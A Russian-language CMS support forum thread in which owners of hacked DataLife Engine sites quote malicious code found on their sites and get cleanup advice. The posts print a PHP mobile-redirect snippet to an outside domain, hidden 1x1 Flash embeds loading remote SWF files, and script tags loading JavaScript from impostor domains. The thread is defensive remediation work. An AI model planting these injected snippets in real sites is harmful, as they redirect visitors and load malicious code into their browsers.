RedBaron 0 Опубликовано: 13 сентября 2013 Рассказать Опубликовано: 13 сентября 2013 Кстати вот такие строчки обнаружил в системных файлах $iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone"); $android = strpos($_SERVER['HTTP_USER_AGENT'],"Android"); $palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS"); $berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry"); $ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod"); if ($iphone || $android || $palmpre || $ipod || $berry === true) { header('Location: http://statuses.ws/'); } подозреваю что это и есть тот самый вирус... так что проверяйте файлы: index.php engine/engine.php engine/init.php engine/data/config.php engine/data/dbconfig.php language/Russian/website.lng Цитата Ссылка на сообщение Поделиться на других сайтах
Olegazzz 0 Опубликовано: 13 сентября 2013 Рассказать Опубликовано: 13 сентября 2013 rifler, Не нужно делать запросов, зайдите в админпанели в раздел "Перестроение публикаций" и сделайте в нем перестроение новостей. DLE сам удалит скрипты из новостей. Мне не помогло, код остался Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 095 Опубликовано: 13 сентября 2013 Рассказать Опубликовано: 13 сентября 2013 Мне не помогло, код остался Все зависит от того какой код у вас, перестроение убирает только JS скрипты. Если у вас не JS, то смотрите http://forum.dle-new...ndpost&p=320525 RedBaron, У вас совсем другая проблема, вы не ставили вовремя совсем старые патчи, в зависимости от версии это либо http://dle-news.ru/b...-versii-97.html либо http://dle-news.ru/b...97-i-nizhe.html вам нужно читать тему http://forum.dle-news.ru/index.php?showtopic=62025&st=120&p=309347&#entry309347 и делать что там написано. Цитата Ссылка на сообщение Поделиться на других сайтах
qpool 0 Опубликовано: 13 сентября 2013 Рассказать Опубликовано: 13 сентября 2013 (изменено) блин я нечего не пойму в каком фале скрипт сидит?? патч поставил ,Новости перестроил , код всеравно остался (( вот код <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="1" height="1"><param name="movie" value="http://webmasters-yandex.ru/flash.swf?881779831" /><param name="quality" value="high" /><param name="scale" value="exactfit" /><param name="bgcolor" value="#FFFFFF" /><param name="AllowScriptAccess" value="always" /><embed src="http://webmasters-yandex.ru/flash.swf?378581582" width="1" height="1" type="application/x-shockwave-flash" allowscriptaccess="always" pluginspage="http://www.macromedia.com/go/getflashplayer"></embed></object> Изменено 13 сентября 2013 пользователем qpool Цитата Ссылка на сообщение Поделиться на других сайтах
Jiihuda 0 Опубликовано: 13 сентября 2013 Рассказать Опубликовано: 13 сентября 2013 mmmmm1501, Jiihuda, В данном случае нужно сделать бекап БД, открыть его в любом текстовом редакторе, например Notepad++ и провести поиск и замену в нем, в бекапе формат немного отличается, поэтому найдите сначала нужный код например по домену. Беда еще в том, что обнаружились вот такие записи <script async=\"async\" type=\"text/javascript\" src=\"http://google-webmaster.ru/XXXXXXXXXXXXXXXXX.js\"></script> где XXXXXXXXXXXXXXXXX - 33 произвольных символа. И таких конструкций 48000 .... Я не силен в Notepad++, поэтому подскажите пожалуйста есть ли возможность как-то искать этот код средствами поиска Notepad++ игнорируя XXXXXXXXXXXXXXXXX ? Может какими то звездочками их заменять или что-то типо-того... Цитата Ссылка на сообщение Поделиться на других сайтах
qpool 0 Опубликовано: 13 сентября 2013 Рассказать Опубликовано: 13 сентября 2013 mmmmm1501, Jiihuda, В данном случае нужно сделать бекап БД, открыть его в любом текстовом редакторе, например Notepad++ и провести поиск и замену в нем, в бекапе формат немного отличается, поэтому найдите сначала нужный код например по домену. Беда еще в том, что обнаружились вот такие записи <script async=\"async\" type=\"text/javascript\" src=\"http://google-webmaster.ru/XXXXXXXXXXXXXXXXX.js\"></script> где XXXXXXXXXXXXXXXXX - 33 произвольных символа. И таких конструкций 48000 .... Я не силен в Notepad++, поэтому подскажите пожалуйста есть ли возможность как-то искать этот код средствами поиска Notepad++ игнорируя XXXXXXXXXXXXXXXXX ? Может какими то звездочками их заменять или что-то типо-того... а где такой код обнаружил подскажи! Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 095 Опубликовано: 13 сентября 2013 Рассказать Опубликовано: 13 сентября 2013 блин я нечего не пойму в каком фале скрипт сидит?? патч поставил ,Новости перестроил , код всеравно остался (( вот код Ни к каком файле, он в БД. Это не скрипт, его перестроение не удалит. Этот код нужно удалять как написано в http://forum.dle-news.ru/index.php?showtopic=64224&view=findpost&p=320525 Беда еще в том, что обнаружились вот такие записи А это уже JS скрипт, чтобы удалить их, просто в админпанели зайдите в перестроение публикаций и сделайте перестроение, DLE его автоматически удалит. Цитата Ссылка на сообщение Поделиться на других сайтах
qpool 0 Опубликовано: 13 сентября 2013 Рассказать Опубликовано: 13 сентября 2013 блин я нечего не пойму в каком фале скрипт сидит?? патч поставил ,Новости перестроил , код всеравно остался (( вот код Ни к каком файле, он в БД. Это не скрипт, его перестроение не удалит. Этот код нужно удалять как написано в http://forum.dle-new...ndpost&p=320525 Беда еще в том, что обнаружились вот такие записи А это уже JS скрипт, чтобы удалить их, просто в админпанели зайдите в перестроение публикаций и сделайте перестроение, DLE его автоматически удалит. ничего не понял ,скачал базу открыл программой беру весь код вставляю в найти и хрен не находит , а просто ввожу какую то строчку 1 так находит ! И на что заменить то так и не понял просто ан пробел ?? Цитата Ссылка на сообщение Поделиться на других сайтах
Jiihuda 0 Опубликовано: 13 сентября 2013 Рассказать Опубликовано: 13 сентября 2013 (изменено) То qpool Я в скачанном файле нашел фрагмент ограниченый обждексом и замешал его на пустую строку. В файле он по другому выглядит, чем выше в ветке этой темы. Проблема лично у меня в том, что Notepad++ замешает по 1000 фрагментов за 1 раз, а у меня их 48 000 и в какой то момент прога просто виснет ))) Завтра буду думать как это победить Изменено 13 сентября 2013 пользователем Jiihuda Цитата Ссылка на сообщение Поделиться на других сайтах
qpool 0 Опубликовано: 13 сентября 2013 Рассказать Опубликовано: 13 сентября 2013 (изменено) То qpool Я в скачанном файле нашел фрагмент ограниченый обждексом и замешал его на пустую строку. В файле он по другому выглядит, чем выше в ветке этой темы. Проблема лично у меня в том, что Notepad++ замешает по 1000 фрагментов за 1 раз, а у меня их 48 000 и в какой то момент прога просто виснет ))) Завтра буду думать как это победить у тебя 48 000 у меня 123 000(( Еще блин Яндекс пометил сайт как вирус посещении упало (( Изменено 13 сентября 2013 пользователем qpool Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 095 Опубликовано: 13 сентября 2013 Рассказать Опубликовано: 13 сентября 2013 qpool, Jiihuda, Зайдите в phpMyAdmin и выполните запросыUPDATE `dle_post` SET `short_story`=REPLACE(`short_story`,'ваш код который нужно найти и удалить','') UPDATE `dle_post` SET `full_story`=REPLACE(`full_story`,'ваш код который нужно найти и удалить','') UPDATE `dle_post` SET `xfields`=REPLACE(`xfields`,'ваш код который нужно найти и удалить','') UPDATE `dle_comments` SET `text`=REPLACE(`text`,'ваш код который нужно найти и удалить','') [/CODE] Запросы нужно выполнить по одному. 1 Цитата Ссылка на сообщение Поделиться на других сайтах
qpool 0 Опубликовано: 14 сентября 2013 Рассказать Опубликовано: 14 сентября 2013 qpool, Jiihuda, Зайдите в phpMyAdmin и выполните запросыUPDATE `dle_post` SET `short_story`=REPLACE(`short_story`,'ваш код который нужно найти и удалить','') UPDATE `dle_post` SET `full_story`=REPLACE(`full_story`,'ваш код который нужно найти и удалить','') UPDATE `dle_post` SET `xfields`=REPLACE(`xfields`,'ваш код который нужно найти и удалить','') UPDATE `dle_comments` SET `text`=REPLACE(`text`,'ваш код который нужно найти и удалить','') Запросы нужно выполнить по одному. вставляю свой код из короткой новости UPDATE `dle_post` SET `short_story`=REPLACE(`short_story`,'<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="1" height="1"><param name="movie" value="http://webmasters-yandex.ru/flash.swf?932337055" /><param name="quality" value="high" /><param name="scale" value="exactfit" /><param name="bgcolor" value="#FFFFFF" /><param name="AllowScriptAccess" value="always" /><embed src="http://webmasters-yandex.ru/flash.swf?27802376" width="1" height="1" type="application/x-shockwave-flash" allowscriptaccess="always" pluginspage="http://www.macromedia.com/go/getflashplayer"></embed></object>','') вот что пишет после запроса Затронуто строк: 0 (запрос занял 0.6940 сек.) Цитата Ссылка на сообщение Поделиться на других сайтах
Jiihuda 0 Опубликовано: 14 сентября 2013 Рассказать Опубликовано: 14 сентября 2013 (изменено) Хм, то же самое. Пробовал ставить код, который брал из скачанного дампа <object classid=\\\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\\\" width=\\\"1\\\" height=\\\"1\\\"><param name=\\\"movie\\\" value=\\\"http://webmasters-yandex.ru/flash.swf?488145815\\\" /><param name=\\\"quality\\\" value=\\\"high\\\" /><param name=\\\"scale\\\" value=\\\"exactfit\\\" /><param name=\\\"bgcolor\\\" value=\\\"#FFFFFF\\\" /><param name=\\\"AllowScriptAccess\\\" value=\\\"always\\\" /><embed src=\\\"http://webmasters-yandex.ru/flash.swf?366636152\\\" width=\\\"1\\\" height=\\\"1\\\" type=\\\"application/x-shockwave-flash\\\" allowscriptaccess=\\\"always\\\" pluginspage=\\\"http://www.macromedia.com/go/getflashplayer\\\"></embed></object> и тоже ничего - 0 строк В принципе, один сайт вылечил методом редактирования файла дампа вручную. Изменено 14 сентября 2013 пользователем Jiihuda Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 095 Опубликовано: 14 сентября 2013 Рассказать Опубликовано: 14 сентября 2013 Jiihuda, Откройте в phpMyAdmin любую новость и посмотрите как код зависан именно в phpMyAdmin, скопируйте его оттуда и выполните запросы. Цитата Ссылка на сообщение Поделиться на других сайтах
qpool 0 Опубликовано: 14 сентября 2013 Рассказать Опубликовано: 14 сентября 2013 Jiihuda, Откройте в phpMyAdmin любую новость и посмотрите как код зависан именно в phpMyAdmin, скопируйте его оттуда и выполните запросы. защел через phpMyAdmin в новость там это показывается так <script async="async" type="text/javascript" src="http://google-webmaster.ru/25b2822c2f5a3230abfadd476e8b04c9.js"></script> сделал запрос как вы написали в ответ мне Затронуто строк: 1 (запрос занял 1.8141 сек.) (( блин я уже не знаю что делать(( Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 095 Опубликовано: 15 сентября 2013 Рассказать Опубликовано: 15 сентября 2013 qpool, У вас JS скрипт. Читайте внимательно, что я писал выше. Для удаления JS скриптов никаких запросов делать не нужно, нужно зайти в админпанель DLE в раздел перестроения публикаций и сделать перестроение новостей. JS скрипты DLE удалит сам при перестроении. 1 Цитата Ссылка на сообщение Поделиться на других сайтах
Astrolv 0 Опубликовано: 15 сентября 2013 Рассказать Опубликовано: 15 сентября 2013 (изменено) Попробовал выполнить запрос: UPDATE `dle_post` SET `short_story`=REPLACE(`short_story`,'<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="1" height="1"><param name="movie" value="http://webmasters-yandex.ru/flash.swf?1306492186" /><param name="quality" value="high" /><param name="scale" value="exactfit" /><param name="bgcolor" value="#FFFFFF" /><param name="AllowScriptAccess" value="always" /><embed src="http://webmasters-yandex.ru/flash.swf?672938198" width="1" height="1" type="application/x-shockwave-flash" allowscriptaccess="always" pluginspage="http://www.macromedia.com/go/getflashplayer"></embed></object>','') Пишет что затронуто 0 строк. Код копировал из PhpMyAdmin. Почему так? Заранее спасибо. Вроде разобрался. Удалено 1000 строк, но новостей больше 7000. И заметил что разные адреса сайтов: webmasters-yandex.ru/flash.swf?672938198 в новостях, а именно цифры в конце. Как тогда таким методом удалить этот код можно? Изменено 15 сентября 2013 пользователем Astrolv Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 095 Опубликовано: 15 сентября 2013 Рассказать Опубликовано: 15 сентября 2013 Astrolv, Этих комбинаций не так много. Ищите просто по домену webmasters-yandex.ru и копируйте код и после чего удаляйте. 1 Цитата Ссылка на сообщение Поделиться на других сайтах
qpool 0 Опубликовано: 15 сентября 2013 Рассказать Опубликовано: 15 сентября 2013 qpool, У вас JS скрипт. Читайте внимательно, что я писал выше. Для удаления JS скриптов никаких запросов делать не нужно, нужно зайти в админпанель DLE в раздел перестроения публикаций и сделать перестроение новостей. JS скрипты DLE удалит сам при перестроении. блин сдедал ка все описано перестроил нвоости уже 4 раза хрен не удоляется ( Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 095 Опубликовано: 15 сентября 2013 Рассказать Опубликовано: 15 сентября 2013 qpool, У вас при перестроении не удаляется код <script async="async" type="text/javascript" src="http://google-webmaster.ru/25b2822c2f5a3230abfadd476e8b04c9.js"></script> из новостей? Этого не может быть. Очистите кеш скрипта в админпанели скрипта после перестроения, может он у вас из кеша показывается. 1 Цитата Ссылка на сообщение Поделиться на других сайтах
RedBaron 0 Опубликовано: 16 сентября 2013 Рассказать Опубликовано: 16 сентября 2013 (изменено) Здравствуйте еще раз! Спасибо администратору за помощь с тем вирусом справился исчезли страницы несуществующие в моем сайте и все вроде спокойно. Но яндекс всеравно определяет на сайте вирус... уже все перелопатил, кеш везде почистил (и на сайте и браузера) чтоб все видеть как есть. Такие коды как описывают выше не нахожу... Может подскажите что еще может быть! Вот результаты проверок антивирусниками Результат выборочной проверки это яндекс Дата последней проверки Страница Вердикт 13.09.2013 http://arsmotorsgrou...e_shaanxi1.html Поведенческий анализ Страницу пересмотрел и через базу ничего подозрительного нет... уже и все ссылки на посторонние сайты удалял еще неделю назад... сейчас оставил повторную проверку всетаки это 13го было... вот результаты проверок других антивирусников: 2ip походу ссылается на яндех Подозрение на вирус! На сайте обнаружены iframe-вставки, ссылающиеся на сомнительные сайты либо обфусицированный код. Google.com относит данный сайт к безопасным Yandex.ru относит данный сайт к опасным! Еще проверил хостинговым антивирусом, доктор вебом и алярмом ничего не обноруживают никаких всплывающих окон... Так же сам пытался найти вирус другим компом с виндоус ХП сп2 ИЭ 6 открывал сайт по разному нифига... PS короче нужен совет, что делать? И возможно ли решить проблему установкой патча на 10 версию PPS на хостинге несколько доменов интернет магазин и форум и тронут только ДЛЕ PPPS или может просто дождаться очередной проверки яндексом... Изменено 16 сентября 2013 пользователем RedBaron Цитата Ссылка на сообщение Поделиться на других сайтах
Hippo 0 Опубликовано: 16 сентября 2013 Рассказать Опубликовано: 16 сентября 2013 Нашел хороший совет по решению данной проблемы на форуме о поисковых системах (это не реклама стороннего ресурса, а просто ссылка аналогичной проблемы, обсуждаемая на другом форуме. Просьба к Администрации сурово не наказывать) Простой способ по удалению дряни из новостей без прямого копания в базе и скриптов. В админке сайта в разделе "Поиск и замена" делаем замену object на script, а потом делаем перестроение публикаций. Все. Мне пришлось пришлось пару раз делать замену: object на script, затем param name на script и embed на script. Потому как после замены object на script остается код вида: <param name="movie" value="http://webmasters-yandex.ru/flash.swf?437160373"><param name="quality" value="high"/><param name="scale" value="exactfit"><param name="bgcolor" value="#FFFFFF"/><param name="AllowScriptAccess" value="always"/><embed src="http://webmasters-yandex.ru/flash.swf?1024826446" width="1" height="1" type="application/x-shockwave-flash" AllowScriptAccess="always" pluginspage="http://www.macromedia.com/go/getflashplayer"></embed>[/PHP] После данных замен сделал перестроение публикаций - как результат, чистые новости. Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 095 Опубликовано: 16 сентября 2013 Рассказать Опубликовано: 16 сентября 2013 RedBaron, Ни один антивирус не показывает что у вас вирус https://www.virustotal.com/ru/url/394fd10f9d23abc0575ab1903c3676401f6741e418671bf7eb0499ac8a181773/analysis/1379327281/ кроме яндекса. Возможно яндекс еще не переиндексировал вашу страницу. 1 Цитата Ссылка на сообщение Поделиться на других сайтах
marazm_ua 10 Опубликовано: 18 сентября 2013 Рассказать Опубликовано: 18 сентября 2013 Когда у меня Яндекс сказал о поведенческом анализе, то полез в .htaccess и там увидел мобильный редирект на вирусняк... Цитата Ссылка на сообщение Поделиться на других сайтах
willow300 0 Опубликовано: 18 сентября 2013 Рассказать Опубликовано: 18 сентября 2013 Может кто-нибудь возьмет на заметку... Я данную проблему решил банальным бекапом базы данных. Учитывая размеры БД - под 400 Мб, чистить, да и банально работать с ней было практически не реально. Учитывая, что после появления вредоносного кода, размер БД увеличился более чем на 100 Мб, четко можно было определить дату заражения... Я попросил хостера проверить по бекапам, когда увеличился объем БД и восстановить ее за день до увеличения. После бекапа сразу обновился до 10 версии и пока все норм. Из минусов данного способа - потеря новостей за несколько дней, но это ничтожно мало учитывая общий объем "излеченых" таким образом релизов. Всем удачи. Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.